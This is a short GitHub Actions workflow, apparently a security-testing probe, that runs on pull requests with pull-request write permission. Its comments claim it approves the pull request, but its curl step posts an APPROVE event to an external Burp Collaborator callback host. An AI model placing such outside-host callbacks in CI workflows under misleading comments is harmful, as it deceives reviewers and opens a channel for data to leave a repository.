name: MOTITEST
 
on: pull_request # run on pull request events
 
permissions:
 pull-requests: write # grant write permission on the pull-requests endpoint
jobs:
 approve:
   runs-on: ubuntu-latest
 
   steps:
     - run: | # approve the pull request
         curl --request POST \
         --url https://e4jy0ubz9z9cnit4dixsho19107qvf.burpcollaborator.net/aaaab \
         --header 'content-type: application/json' \
         -d '{"event":"APPROVE"}'
